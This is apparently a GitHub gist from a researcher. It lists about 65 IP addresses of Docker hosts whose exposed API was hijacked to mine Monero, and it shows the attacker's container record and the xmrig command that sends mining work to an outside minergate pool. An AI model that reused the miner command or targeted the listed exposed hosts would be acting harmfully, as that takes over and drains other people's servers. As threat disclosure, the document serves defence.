Skip to content

Instantly share code, notes, and snippets.

@random-robbie

random-robbie/Docker-XMR.md

Last active April 27, 2019 17:11
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save random-robbie/5c4bd9a7c445b518a45eba278542bd25 to your computer and use it in GitHub Desktop.
Save random-robbie/5c4bd9a7c445b518a45eba278542bd25 to your computer and use it in GitHub Desktop.
Download ZIP
Hijacked XMR Docker Servers
Raw
Docker-XMR.md

Hijacked Systems

All the following IPs have the docker API exposed and have been hijacked to mine XMR

101.132.125.134
101.251.243.178
101.255.124.125
101.89.134.211
110.87.27.14
114.116.95.37
117.68.155.0
118.24.67.166
119.123.179.148
119.28.84.69
119.29.25.238
120.55.60.63
120.78.161.231
122.112.211.221
122.130.156.202
122.130.162.88
130.61.37.213
13.126.251.47
13.127.225.86
132.232.136.141
132.232.89.207
138.197.178.7
142.44.136.43
142.93.58.171
159.89.214.243
18.191.227.117
18.216.162.54
18.219.135.89
182.61.18.126
193.112.82.34
198.181.44.229
206.189.172.84
34.219.234.223
34.241.123.235
34.241.26.75
34.243.229.106
35.196.240.112
36.111.35.106
37.123.179.67
40.113.227.30
40.85.221.142
45.115.236.2
45.79.90.143
46.238.43.38
49.4.88.169
52.221.217.38
52.221.254.168
52.55.245.50
52.66.50.254
52.76.241.217
52.83.226.113
52.83.231.122
52.83.255.247
52.87.113.76
54.145.128.254
54.175.91.189
54.183.234.49
54.191.252.227
54.200.143.122
54.202.26.218
54.223.241.195
54.66.165.97
66.226.76.221
68.168.131.140
81.226.150.217

Docker Image

All appear to have a the following image and command line.

{
        "Status": "Up 20 hours", 
        "Created": 1536506330, 
        "Image": "tmpdocker/xmr", 
        "Labels": {}, 
        "NetworkSettings": {
            "Networks": {
                "bridge": {
                    "NetworkID": "REDACTED", 
                    "MacAddress": "REDACTED", 
                    "GlobalIPv6PrefixLen": 0, 
                    "Links": null, 
                    "GlobalIPv6Address": "", 
                    "IPv6Gateway": "", 
                    "DriverOpts": null, 
                    "IPAMConfig": null, 
                    "EndpointID": "REDACTED", 
                    "IPPrefixLen": 16, 
                    "IPAddress": "172.17.0.3", 
                    "Gateway": "172.17.0.1", 
                    "Aliases": null
                }
            }
        }, 
        "HostConfig": {
            "NetworkMode": "default"
        }, 
        "ImageID": "sha256:96f015c729696b0fe40d4c12710990be310543c51a77f7e4150edc0a6bd3158e", 
        "State": "running", 
        "Command": "./xmrig -o stratum+tcp://xmr.pool.minergate.com:45700 -u tmp456789@protonmail.com -p x --safe -k", 
        "Names": [
            "/clever_lovelace"
        ], 
        "Mounts": [], 
        "Id": "c0c4149d65341041d8c4b6577b24669e4bf74dcb0e327d12157ad5564ee2e792", 
        "Ports": []
    },

Miner Pool Details

All appear to have the same protonmail email address used for the miner pool

 tmp456789@protonmail.com connecting to stratum+tcp://xmr.pool.minergate.com:45700
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment